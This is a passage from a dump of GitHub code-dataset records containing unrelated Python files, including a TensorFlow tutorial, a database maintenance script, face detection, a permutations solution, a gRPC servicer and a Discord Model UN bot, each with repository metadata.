2\nprint(sess.run(vec))\nprint(sess.run(vec))\nprint(sess.run((out1, out2)))\n\n# A ML graph needs variable result. Placeholders are designed to hold future values\nx = tf.placeholder(tf.float32)\ny = tf.placeholder(tf.float32)\nz = x + y\n\nprint(sess.run(z, feed_dict={x: 3, y: 4.5}))\nprint(sess.run(z, feed_dict={x: [1, 3], y: [2, 4]}))\n\n#Datasets are however the preffered way of working with models\n\nmy_data = [\n [0, 1,],\n [2, 3,],\n [4, 5,],\n [6, 7,],\n]\nslices = tf.data.Dataset.from_tensor_slices(my_data)\nnext_item = slices.make_one_shot_iterator().get_next()\n\nwhile True:\n try:\n print(sess.run(next_item))\n except tf.errors.OutOfRangeError:\n break\n\n#If statefull the itterator may need to initialized\n\nr = tf.random_normal([10,3])\ndataset = tf.data.Dataset.from_tensor_slices(r)\niterator = dataset.make_initializable_iterator()\nnext_row = iterator.get_next()\n\nsess.run(iterator.initializer)\nwhile True:\n try:\n print(sess.run(next_row))\n except tf.errors.OutOfRangeError:\n break\n\n#Trainable models need values to to be modified in the graph to reach now outputs with same inputs.\n# Layers are used and package variables and opperations together.\n# A denseely-connected layer applies an opitonal activation on the output to all functions inputs\n\nx = tf.placeholder(tf.float32, shape=[None, 3])\nlinear_model = tf.layers.Dense(units=1)\ny = linear_model(x)\n\n#Initializing the layers resulting variables\ninit = tf.global_variables_initializer()\nsess.run(init)\n\n#Now we can evaluate the linear model's output tensors as any otherself.\n\nprint(sess.run(y, {x: [[1, 2, 3],[4, 5, 6]]}))\n\n# Condensed removing access to the linear model layer\nx = tf.placeholder(tf.float32, shape=[None, 3])\ny = tf.layers.dense(x, units=1)\ninit = tf.global_variables_initializer()\nsess.run(init)\nprint(sess.run(y, {x: [[1, 2, 3], [4, 5, 6]]}))\n\n# Feature columns are easiest done with tf.feature_column.input_layer and only accepts dense columnsself.\n# Viewing requires a wrapper of indicator_column\n\nfeatures = {\n 'sales' : [[5], [10], [8], [9]],\n 'department': ['sports', 'sports', 'gardening', 'gardening']}\n\ndepartment_column = tf.feature_column.categorical_column_with_vocabulary_list(\n 'department', ['sports', 'gardening'])\ndepartment_column = tf.feature_column.indicator_column(department_column)\n\ncolumns = [\n tf.feature_column.numeric_column('sales'),\n department_column\n]\n\ninputs = tf.feature_column.input_layer(features, columns)\n\n#Feature columns have an internal state like layers and require initializationself.\n# Categorical columns use lookup tables requiring a different intiialization, tf.tables_initializer\n\nvar_init = tf.global_variables_initializer()\ntable_init = tf.tables_initializer()\nsess = tf.Session()\nsess.run((var_init, table_init))\n\n# once sess initializes. Run\nprint(sess.run(inputs))\n\n\n# Training\n# Some arbritrary inputs\nx = tf.constant([[1], [2], [3], [4]], dtype=tf.float32, name=\"C1\")\ny_true = tf.constant([[0], [-1], [-2], [-3]], dtype=tf.float32, name=\"C2\")\n\n#The training model with one outputs\nlinear_model = tf.layers.Dense(units=1, name=\"L1\")\ny_pred = linear_model(x)\nsess = tf.Session()\ninit = tf.global_variables_initializer()\nsess.run(init)\nprint(sess.run(y_pred))\n\n# Loss to train\nloss = tf.losses.mean_squared_error(labels=y_true, predictions=y_pred)\nprint(sess.run(loss))\n\n#Optimizers test the loss\noptimizer = tf.train.GradientDescentOptimizer(0.01)\ntrain = optimizer.minimize(loss)\n\n#itterative training\nfor i in range(100):\n _, loss_value = sess.run((train, loss))\n print(loss_value)\n\n'''\n\n\n\n#Completed:\n\n#The input values\nx = tf.constant([[4], [3], [2], [1]], dtype=tf.float32, name=\"X\")\n#The comparison values\ny_true = tf.constant([[0], [-1], [-2], [-3]], dtype=tf.float32, name=\"Y_t\")\n#A dense LM\nlinear_model = tf.layers.Dense(units=1, name=\"Dense_LM\")\n'''Dense layer y_pred that takes a batch of input vectors,'''\n#assinged to y_predictions\ny_pred = linear_model(x)\n#With loss operations based on y_true labels and predictions dictated by the model\nloss = tf.losses.mean_squared_error(labels=y_true, predictions=y_pred)\n'''y_pred produces a single output and MSE judges it'''\n\n#Set up the basic trainer to minimize loss\noptimizer = tf.train.GradientDescentOptimizer(0.01, name=\"gdo\")\ntrain = optimizer.minimize(loss)\n\n#set internal states\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\n#Train n times outputting a blank and the loss value.\n#Put the training function and loss function into the run function.\nfor i in range(10000):\n _, loss_value = sess.run((train, loss))\n print(loss_value)\n\n#Run the variables through the prediction model\nprint(sess.run(y_pred))\n\n\n\n\n\n#TensorBoard is a way to viusalize the graphself.\nwriter = tf.summary.FileWriter('.')\nwriter.add_graph(tf.get_default_graph())\n\n# Go into the directory and type `tensorboard --logdir .` to view your graph\n\n\ninput()\n","repo_name":"ECHibiki/TesnorFlow-Exercises","sub_path":"Tensorflow Examples/TF low level.py","file_name":"TF low level.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10706265044","text":"#!/usr/bin/env python\n\n'''Update the OntologyTreeStructureTable to fix the old na root term (which was undefined as contained many optional NAs)\n'''\n\nimport sys\n\nimport argparse\nimport re\nfrom collections import defaultdict\n\nimport oboparse\nimport psycopg2\n\nfrom dbbact_server import db_access\nfrom dbbact_server.utils import debug, SetDebugLevel\n\n__version__ = \"0.1\"\n\n\ndef fix_na(con, cur, commit=False):\n\t'''Update the OntologyTreeStructureTable to fix the old na root term (which was undefined as contained many optional NAs)\n\n\tParameters\n\t----------\n\tcon, cur: dbbact psycopg2 database connection and cursor\n\tcommit: bool, optional\n\t\tTrue to commit changes, False to just perform dry run\n\t'''\n\t# find the id of the dbbact ontology\n\tcur.execute('SELECT * FROM ontologynamestable WHERE description=%s', ['dbbact'])\n\tres = cur.fetchone()\n\tontologynameid = res['id']\n\tif ontologynameid != 8:\n\t\traise ValueError('strange dbbact ontologynameid: %s (instead of 8)' % ontologynameid)\n\n\t# find the dbbact root term id \"dbbact root\" (id 1811274)\n\tcur.execute('SELECT * from OntologyTable WHERE description=%s', ['dbbact root'])\n\tres = cur.fetchone()\n\tif res['term_id'] != 'dbbact:1811274':\n\t\traise ValueError('\"dbbact root\" term_id is %s instead of dbbact:1811274' % res['term_id'])\n\troot_id = res['id']\n\n\tcur.execute('SELECT * FROM OntologyTable WHERE term_id LIKE %s', ['dbbact:%'])\n\tdebug(3, 'Found %d dbbact terms' % cur.rowcount)\n\tres = cur.fetchall()\n\tnum_na_parents = 0\n\tfor cres in res:\n\t\tcur.execute('SELECT * FROM OntologyTreeStructureTable WHERE ontologyid=%s', [cres['id']])\n\t\ttres = cur.fetchall()\n\t\tfor ctres in tres:\n\t\t\tcur.execute('SELECT * FROM OntologyTable WHERE id=%s LIMIT 1', [ctres['ontologyparentid']])\n\t\t\tif cur.rowcount == 0:\n\t\t\t\tcontinue\n\t\t\tttres = cur.fetchone()\n\t\t\tif ttres['description'] == 'na':\n\t\t\t\tcur.execute('UPDATE OntologyTreeStructureTable SET ontologyparentid=%s, ontologynameid=%s WHERE uniqueid=%s', [root_id, ontologynameid, ctres['uniqueid']])\n\t\t\t\tnum_na_parents += 1\n\tdebug(4, 'updating %d dbbact terms roots' % num_na_parents)\n\tif commit:\n\t\tcon.commit()\n\t\tdebug(3, 'commited')\n\tdebug(3, 'done')\n\n\ndef main(argv):\n\tparser = argparse.ArgumentParser(description='Update the OntologyTreeStructureTable to fix the old na root term (which was undefined as contained many optional NAs). version ' + __version__, formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument('--port', help='postgres port', default=5432, type=int)\n\tparser.add_argument('--host', help='postgres host', default=None)\n\tparser.add_argument('--database', help='postgres database', default='dbbact')\n\tparser.add_argument('--user', help='postgres user', default='dbbact')\n\tparser.add_argument('--password', help='postgres password', default='magNiv')\n\tparser.add_argument('--debug-level', help='debug level (1 for debug ... 9 for critical)', default=2, type=int)\n\tparser.add_argument('--dry-run', help='do not commit', action='store_true')\n\targs = parser.parse_args(argv)\n\n\tSetDebugLevel(args.debug_level)\n\n\tcon, cur = db_access.connect_db(database=args.database, user=args.user, password=args.password, port=args.port, host=args.host)\n\tfix_na(con, cur, commit=not args.dry_run)\n\n\nif __name__ == \"__main__\":\n\tmain(sys.argv[1:])\n","repo_name":"amnona/dbbact-server","sub_path":"utils/fix_na.py","file_name":"fix_na.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14964661386","text":"#googleimagesdownload -k \"\" -l 20\n\n\nimport cv2\nimport os\nimport shutil\n\norg_dir = \"dataset/01_org/\"\nface_dir = \"dataset/02_face/\"\n\ncascade_xml = \"haarcascade_frontalface_default.xml\"\n\n\ndef main():\n name_list = [filename for filename in os.listdir(org_dir) if not filename.startswith(\".\")]\n print(name_list)\n \n\n for name in name_list:\n name.replace(\" \", \"_\")\n org_char_dir = org_dir + name + \"/\"\n print(org_char_dir)\n\n face_char_dir = face_dir + name + \"/\"\n os.makedirs(face_char_dir, exist_ok=True)\n\n print(len(face_char_dir))\n\n detect_face(org_char_dir, face_char_dir)\n\ndef detect_face(org_char_dir, face_char_dir):\n image_list = os.listdir(org_char_dir)\n\n for image_file in image_list:\n \n org_image = cv2.imread(org_char_dir + image_file)\n\n if org_image is None:\n print(\"Not open:\", image_file)\n continue\n\n #convert gray_scale\n img_gs = cv2.cvtColor(org_image, cv2.COLOR_BGR2GRAY)\n \n #detect_face\n cascade = cv2.CascadeClassifier(cascade_xml)\n\n for i_mn in range(1, 7, 1):\n face_list = cascade.detectMultiScale(img_gs, scaleFactor=1.1, minNeighbors=i_mn, minSize=(200, 200))\n #if more than one_face detected, get image (64*64)\n if len(face_list ) > 0:\n for rect in face_list:\n image = org_image[rect[1]:rect[1]+rect[3], rect[0]:rect[0]+rect[2]]\n if image.shape[0] < 64 or image.shape[1] < 64:\n continue\n face_image = cv2.resize(image, (64, 64))\n\n else:\n continue\n \n\n #save face_image\n face_file_name = os.path.join(face_char_dir, \"face-\" + image_file)\n cv2.imwrite(str(face_file_name), face_image)\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n\n\n ","repo_name":"priekosukeyauchi/face_classification","sub_path":"02_face_detection.py","file_name":"02_face_detection.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1320879076","text":"# Given an array nums of distinct integers, return all the possible permutations. You can return the answer in any order.\n\n\ndef backtracking(nums, arr, answers):\n if len(nums) == 0: \n answers.append(list(arr)) \n\n for i in range(0 , len(nums)):\n arr.append(nums[i])\n backtracking(nums[:i] + nums[i+1:], arr, answers) \n arr.pop() \n\ndef permute(nums):\n if len(nums) == 0:\n return answers\n \n arr = list()\n answers = list()\n\n backtracking(nums, arr, answers)\n \n return answers\n\n\nprint(permute([1,2,3])) # Output: [[1,2,3],[1,3,2],[2,1,3],[2,3,1],[3,1,2],[3,2,1]]\nprint(permute([0,1])) # Output: [[0,1],[1,0]]\nprint(permute([1])) # Output: [[1]]","repo_name":"YaraHorany/Programming-Challenges","sub_path":"Permutations.py","file_name":"Permutations.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25363969960","text":"import pickle\nimport numpy as np\nimport random\n\n\n# Load the trained model from the pickle file\nwith open(\"C:/Users/habibars/Downloads/Network monitoring/intrusion_detection/random_forest_model.pkl\", 'rb') as f:\n model = pickle.load(f)\n\n# Define the infer method\ndef infer(data):\n \n # Reshape the data to ensure it has the correct shape\n data = np.reshape(data, (1, -1))\n\n # Use the trained model to make a prediction on the input data\n prediction = model.predict(data)\n\n # Return the predicted class (e.g. \"BENIGN\" or \"Attack\")\n return prediction[0]\n\n\nif __name__ == '__main__':\n # Note: Only take input when you run the file individually \n # Generate a list of 69 random numbers between 0 and 1\n data = [random.uniform(0, 1) for _ in range(69)]\n\n prediction = infer(data)\n print(prediction)\n\n# Note: Command to run the file \"python inference.py\"\n\n\n","repo_name":"arsalanhabib01/Random-forest-model","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20272784497","text":"import src.grpc.pb.message_pb2 as message_pb2\nfrom src.logic.handler import MessageHandler\nfrom src.logic.message_queue import MessageQueue\nfrom src.wit.wit import send_text\nimport src.grpc.pb.message_pb2_grpc as message_pb2_grpc\n\n\nclass MessageServicer(message_pb2_grpc.MessageServicer):\n\n def SingleRequest(self, request, context):\n wit_response = send_text(request.body)\n try:\n response = MessageHandler(wit_response, request.client_type).handle_message()\n except Exception as e:\n print(e)\n return message_pb2.Success(success=False)\n MessageQueue.add(response, request.client_type)\n return message_pb2.Success(success=True)\n\n def StreamRequest(self, request_iterator, context):\n while True:\n while MessageQueue.get_length() > 0:\n response, client_type = MessageQueue.get_first()\n yield message_pb2.MessageResponse(body=response.text, client_type=client_type)\n","repo_name":"nloetkemann/Lilly","sub_path":"Server/src/grpc/message_service.py","file_name":"message_service.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37331005416","text":"books = [\"Learn You a Haskell\", \n \"The Healthy Programmer\",\n \"Code Complete\",\n \"The Pragmatic Programmer\",\n \"Pro Git\",\n \"Introduction to Algorithms\",\n \"Concrete Mathematics\"]\nindex = 0\n\nwhile index < len(books):\n\tprint(books[index])\n\tindex += 1","repo_name":"presian/HackBulgaria","sub_path":"Programming0-1/Week_2/2-List-Problems/while_traverse.py","file_name":"while_traverse.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9863334712","text":"import numpy as np\nfrom wave_1d_fd_pml.propagators import Pml2\n\nclass Rtm(object):\n def __init__(self, dx, dt=None, pml_width=10, profile=None):\n self.dx = dx\n self.dt = dt\n self.pml_width = pml_width\n self.profile = profile\n\n def migrate_shot(self, model, source, source_x, receivers, receivers_x,\n imaging_condition_interval=1, ):\n assert source.ndim == 1\n assert receivers.ndim == 2\n source = source[np.newaxis, :]\n source_x = np.array([source_x])\n num_imaging_steps = int((receivers.shape[1] - 1) / imaging_condition_interval)\n\n prop = Pml2(model, self.dx, self.dt, self.pml_width, self.profile)\n nx = len(model)\n\n source_snapshots = self._forward_source(source, source_x,\n imaging_condition_interval,\n num_imaging_steps, prop, nx)\n\n image = self._backward_receivers(receivers, receivers_x,\n imaging_condition_interval,\n num_imaging_steps,\n source_snapshots, prop, nx)\n\n return image\n\n def _forward_source(self, source, source_x,\n imaging_condition_interval,\n num_imaging_steps, prop, nx):\n\n source_snapshots = np.zeros([num_imaging_steps, nx], np.float32)\n for imaging_step in range(0, num_imaging_steps):\n start_time_step = imaging_step * imaging_condition_interval\n end_time_step = start_time_step + imaging_condition_interval\n if end_time_step < source.shape[1]:\n source_snapshots[imaging_step, :] = \\\n prop.step(imaging_condition_interval,\n source[:, start_time_step:end_time_step],\n source_x)\n elif start_time_step < source.shape[1]:\n remaining_source_steps = source.shape[1] - start_time_step\n steps_after_source = (imaging_condition_interval -\n remaining_source_steps)\n prop.step(remaining_source_steps,\n source[:, start_time_step:],\n source_x)\n source_snapshots[imaging_step, :] = \\\n prop.step(steps_after_source)\n else:\n source_snapshots[imaging_step, :] = \\\n prop.step(imaging_condition_interval)\n\n return source_snapshots\n\n def _backward_receivers(self, receivers, receivers_x,\n imaging_condition_interval,\n num_imaging_steps,\n source_snapshots, prop, nx):\n\n image = np.zeros([nx], np.float32)\n for imaging_step in range(num_imaging_steps - 1, -1, -1):\n start_time_step = (imaging_step + 2) * imaging_condition_interval - 1\n end_time_step = start_time_step - imaging_condition_interval\n if start_time_step >= receivers.shape[1]:\n start_time_step = receivers.shape[1] - 1\n receiver_snapshot = \\\n prop.step(start_time_step - end_time_step,\n receivers[:, start_time_step:end_time_step:-1],\n receivers_x)\n image += (source_snapshots[imaging_step, :] *\n receiver_snapshot[:] * imaging_condition_interval)\n\n return image\n\n def model_shot(self, model, source, source_x, receivers_x, max_time):\n assert source.ndim == 1\n source = source[np.newaxis, :]\n source_x = np.array([source_x])\n num_receivers = len(receivers_x)\n\n prop = Pml2(model, self.dx, self.dt, self.pml_width, self.profile)\n\n nt = int(max_time / self.dt)\n receivers = np.zeros([num_receivers, nt], np.float32)\n for step in range(nt):\n wavefield = prop.step(1,\n source[:, step:step+1],\n source_x)\n receivers[:, step] = wavefield[receivers_x]\n\n return receivers\n","repo_name":"ar4/rtm_1d","sub_path":"rtm_1d/rtm.py","file_name":"rtm.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40052292714","text":"import sys\nimport datetime\nimport pandas as pd\nfrom scipy import stats\n\ndef calc_zscore(df, name):\n try:\n zscore = stats.zscore(df.ix[:, 1])\n df[5] = zscore\n except TypeError:\n print(\"TypeError: \" + name)\n return df\n\ndef add_zcore(filename):\n try:\n df = pd.read_table(filename, header=None)\n scored_df = calc_zscore(df, filename)\n scored_df.to_csv(filename, header=None, index=None, sep=\"\\t\")\n except pd.parser.CParserError:\n print(\"ParseError: \" + filename)\n\ndef main(args):\n try:\n yyyymmdd = args.pop(1)\n if yyyymmdd == \"today\":\n yyyymmdd = datetime.date.today().strftime('%Y%m%d')\n except IndexError:\n d = datetime.date.today() - datetime.timedelta(days=1)\n yyyymmdd = d.strftime('%Y%m%d')\n\n filename = \"/home/fluent/.fluent/log/hotnews_\" + yyyymmdd + \".txt\"\n add_zcore(filename)\n\nif __name__ == '__main__':\n argsmin = 0\n version = (3, 0)\n if sys.version_info > (version):\n if len(sys.argv) > argsmin:\n sys.exit(main(sys.argv))\n else:\n print(\"This program needs at least %(argsmin)s arguments\" %\n locals())\n else:\n print(\"This program requires python > %(version)s\" % locals())\n","repo_name":"id774/hotnews","sub_path":"zscore_daily.py","file_name":"zscore_daily.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20594812551","text":"# https://leetcode.com/problems/roman-to-integer/\n# Input: s = \"MCMXCIV\"\n# Output: 1994\n# Explanation: M = 1000, CM = 900, XC = 90 and IV = 4.\n\n# Symbol Value\n# I 1\n# V 5\n# X 10\n# L 50\n# C 100\n# D 500\n# M 1000\nimport roman as roman\n\n\nclass Solution:\n\n\n def romanToInt(self, s: str) -> int:\n rule_add = {\n 'I': 1,\n 'V': 5,\n 'X': 10,\n 'L': 50,\n 'C': 100,\n 'D': 500,\n 'M': 1000\n }\n\n rule_div = {\n ('I', 'V'): 3,\n ('I', 'X'): 8,\n ('X', 'L'): 30,\n ('X', 'C'): 80,\n ('C', 'D'): 300,\n ('C', 'M'): 800\n }\n number = 0\n prev_l = None\n for l in s:\n if prev_l and rule_add[l] > rule_add[prev_l]:\n number += rule_div[(prev_l, l)]\n print(number)\n else:\n number += rule_add[l]\n print(number)\n prev_l = l\n return number\n\n\n if __name__ == '__main__':\n s = 'MCMXCIV'\n f = romanToInt('self', s)\n\n","repo_name":"yention/codewar","sub_path":"leetcode/RomanToInt.py","file_name":"RomanToInt.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"349791859","text":"import json\n\n# entire database class with all the functions\nclass MyDb:\n def __init__(self, dbName):\n self.fileName = dbName + \".json\"\n self.json = self.loadDatabase()\n self.collection = \"\"\n def loadDatabase(self):\n with open(self.fileName) as file:\n return json.load(file)\n\n def saveDatabase(self):\n with open(self.fileName, \"w\") as file:\n file.write(json.dumps(self.json, indent=4)) \n\n def changeCollection(self, nameOfCol):\n try:\n self.json[nameOfCol]\n except KeyError:\n print(\"This collection is not in database, preparing collection.\")\n self.json[nameOfCol] = []\n \n self.collection = nameOfCol\n def getAll(self):\n return self.json[self.collection]\n def find(self, query):\n key = list(query.keys())[0]\n for obj in self.json[self.collection]:\n if obj[key] == query[key]:\n return obj\n\n def create(self, obj):\n highestId = 0\n for user in self.json[self.collection]:\n if user[\"id\"] >= highestId:\n highestId = user[\"id\"] \n highestId += 1\n obj[\"id\"] = highestId\n self.json[self.collection].append(obj)\n self.saveDatabase()\n return obj\n \n def delete(self, query):\n key = list(query.keys())[0]\n for obj in self.json[self.collection]:\n if obj[key] == query[key]:\n self.json[self.collection].remove(obj)\n self.saveDatabase()\n return True \n return False\n\n def update(self, query, updateObj):\n queryKey = list(query.keys())[0]\n updateKey = list(updateObj.keys())[0]\n for obj in self.json[self.collection]:\n if obj[queryKey] == query[queryKey]:\n obj[updateKey] == updateObj[updateKey]\n self.saveDatabase()\n return obj \n return False\n\ndef main():\n db = MyDb(\"users\")\n db.changeCollection(\"prizemi\")\n name = input(\"Name: \")\n print(db.getAll())\n user = db.create({\"name\": name})\n print(db.getAll())\n\nif __name__ == '__main__':\n main() \n","repo_name":"HollowFalls/retirement-product","sub_path":"myPyDb.py","file_name":"myPyDb.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10773477298","text":"import os\nimport subprocess\nimport tempfile\nfrom pprint import pformat\nfrom src.cpp_builder import CPPBuilder, compile_cpp_module\n\n\ndef get_test_stdout(root_node, compile_only=False):\n source_path = tempfile.mktemp(dir=\"/tmp\", prefix=\"drake_test\", suffix=\".cpp\")\n header_path = source_path.replace('.cpp', '.hpp')\n exe_path = source_path.replace('.cpp', '')\n\n with CPPBuilder(c=source_path, h=header_path) as builder:\n root_node.to_cpp(builder)\n\n print(\"\\nCPP header file:\\n\", open(header_path).read())\n print(\"\\nCPP source file:\\n\", open(source_path).read())\n\n compile_cpp_module([ source_path ], exe_path)\n\n if compile_only:\n return None\n\n output = subprocess.check_output(exe_path)\n output = output.decode('utf-8').strip()\n\n return output\n","repo_name":"programWhiz/drake","sub_path":"tests/test_hl_ast/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2746996203","text":"# main.py\nfrom collections import namedtuple\nfrom datetime import datetime\nfrom functools import partial\nfrom collections import defaultdict\n\n\nfile_name = './nyc_parking_tickets_extract.csv'\n\nwith open(file_name) as f:\n column_headers = next(f).strip('\\n').split(',')\n sample_data = next(f).strip('\\n').split(',')\n\nprint(column_headers)\nprint(sample_data)\n\ncolumn_names = [header.replace(' ','_').lower() for header in column_headers]\nprint(column_names)\nprint(list(zip(column_names, sample_data)))\nTicket = namedtuple('Ticket',column_names)\n\n# with open(file_name) as f:\n# next(f)\n# raw_data_row = next(f)\n#\n#\n# print([raw_data_row])\ndef read_data():\n with open(file_name) as f:\n next(f)\n yield from f\nraw_data = read_data()\n\ndef parse_int(value, *, default=None):\n try:\n return int(value)\n except ValueError:\n return default\n\n\n# print(parse_int('test', default='not an interger'))\n#\n# print(parse_int(10, default='not an integer'))\n\ndef parse_date(value, *, default=None):\n date_format = '%m/%d/%Y'\n try:\n return datetime.strptime(value, date_format).date()\n except ValueError:\n return default\n\n\n# print(parse_int('hello', default='N/A'))\n# print(parse_date('3/28/2018'))\n# print(parse_date('231212', default='N/A'))\n\ndef parse_string(value, *, default=None):\n try:\n cleaned = value.strip()\n if not cleaned:\n return default\n else:\n return cleaned\n except ValueError:\n return default\n\n\n# print(parse_string(' helllo '))\n# print(parse_string(' ', default='N/A'))\n\ncolumn_parsers = (parse_int,\n parse_string,\n lambda x: parse_string(x, default=''),\n partial(parse_string, default=''),\n parse_date,\n parse_int,\n partial(parse_string, default=''),\n parse_string,\n lambda x: parse_string(x, default='')\n )\n\n\ndef parse_row(row, *, default=None):\n fields = row.strip('\\n').split(',')\n parsed_data = [func(field)\n for func, field in zip(column_parsers, fields)]\n # return parsed_data\n if all(item is not None for item in parsed_data):\n return Ticket(*parsed_data)\n else:\n return default\nrows = read_data()\n\n\nprint('-------')\nfor _ in range(5):\n row = next(rows)\n parsed_data = parse_row(row)\n print(parsed_data)\n\n\nfor row in read_data():\n parsed_row = parse_row(row)\n if parsed_row is None:\n print(list(zip(column_names, row.strip('\\n').split(','))), end='\\n\\n')\n\n\ndef parsed_data():\n for row in read_data():\n parsed = parse_row(row)\n if parsed:\n yield parsed\nparsed_rows = parsed_data()\n\n\n# for _ in range(5):\n# print(next(parsed_rows))\n\n\ndef violation_count_by_make():\n makes_counts = defaultdict(int)\n for data in parsed_data():\n makes_counts[data.vehicle_make] += 1\n\n return {make: cnt\n for make, cnt in sorted(makes_counts.items(),\n key=lambda t: t[1],\n reverse=True)}\n\n\nprint(violation_count_by_make())","repo_name":"elmi-elmi/dD-pr6-demo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6106144375","text":"import discord\r\nimport time\r\nimport asyncio\r\nfrom discord import FFmpegPCMAudio\r\nfrom collections import defaultdict\r\nfrom discord.ext import commands, tasks\r\nfrom discord.utils import get\r\nfrom youtube_dl import YoutubeDL\r\nclass Chair(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.session={}\r\n self.delegate=self.bot.get_cog('Delegate')\r\n self.general_speakers={}\r\n self.player={}\r\n self.register = defaultdict(dict)\r\n \r\n @commands.has_role('Chair')\r\n @commands.command(brief='Starts a session.', description='Enables all commands for a session and invites bot to voice channel.')\r\n async def startSession(self, ctx):\r\n self.session[ctx.guild.id]=True\r\n if self.delegate is not None:\r\n self.delegate.session[ctx.guild.id]=True\r\n self.delegate.general_speakers[ctx.guild.id]=[]\r\n else:\r\n t=[]\r\n self.general_speakers[ctx.guild.id]=t\r\n self.register[ctx.guild.id]={}\r\n connected = ctx.author.voice\r\n if connected:\r\n voice_client = get(ctx.bot.voice_clients, guild=ctx.guild)\r\n if voice_client and voice_client.is_connected():\r\n embedVar = discord.Embed(title=\"Error\", description=\"Bot is already in VC. Please disconnect bot from VC and try again.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.channel.send(embed=embedVar)\r\n \r\n else:\r\n await connected.channel.connect() \r\n await ctx.channel.send(\"Session has started!\")\r\n else:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Please join a voice channel.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.send(embed=embedVar)\r\n @startSession.error\r\n async def startSession_error(c,ctx, error):\r\n if isinstance(error, commands.MissingRole):\r\n embedVar = discord.Embed(title=\"Error\", description=\"The 'Chair' role is required to run this command.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.send(embed=embedVar)\r\n @commands.has_role('Chair')\r\n @commands.command(brief='Ends the current Session.', description='Disables session commands and disconnects bot from voice channel.\\n Clears GS list.')\r\n async def endSession(self, ctx):\r\n self.session[ctx.guild.id]=False\r\n if self.delegate is not None:\r\n self.delegate.session[ctx.guild.id]=False\r\n self.delegate.general_speakers[ctx.guild.id]=[]\r\n \r\n connected = ctx.author.voice\r\n if connected:\r\n server=ctx.message.guild.voice_client\r\n await server.disconnect()\r\n await ctx.channel.send(\"Session has ended!\")\r\n \r\n @commands.has_role('Chair') \r\n @commands.command(brief='View the general speakers list.', description='Prints out the current general speakers list.')\r\n async def GS(self, ctx):\r\n if self.session[ctx.guild.id]==True:\r\n embedVar = discord.Embed(title=\"General Speakers List\", description=\"General Speakers.\", color=discord.Color.from_rgb(78,134,219))\r\n t=''\r\n if self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]==[]:\r\n embedVar = discord.Embed(title=\"General Speakers List\", description=\"This list is empty.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.channel.send(embed=embedVar)\r\n else:\r\n for country in self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]:\r\n t=t+country+'\\n'\r\n embedVar.add_field(name=\"Countries:\", value=t, inline=False)\r\n \r\n await ctx.channel.send(embed=embedVar)\r\n \r\n @commands.has_role('Chair') \r\n @commands.command(brief='Removes first delegate from general speakers list.', description='Remove first delegate from general speakers list.\\n Used just after a speaker has finished.')\r\n async def popGS(self, ctx):\r\n if self.session[ctx.guild.id]==True:\r\n if self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]==[]:\r\n embedVar = discord.Embed(title=\"Error\", description=\"List is empty.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.channel.send(embed=embedVar) \r\n else:\r\n t=self.bot.get_cog('Delegate').general_speakers[ctx.guild.id][0]\r\n self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]=self.bot.get_cog('Delegate').general_speakers[ctx.guild.id][1:]\r\n self.general_speakers[ctx.guild.id]=self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]\r\n \r\n await ctx.channel.send(str(t)+' was removed from the GS list.')\r\n \r\n\r\n\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Yields the floor to a delegate.', description='Needs [delegate name] [time in seconds] and starts a timer.')\r\n async def speak(self,ctx, *,args):\r\n \r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n u=str(args[0])\r\n try:\r\n t=int(args[1])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n return\r\n except IndexError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Not enough arguments. Please provide Delegate and Time.\", 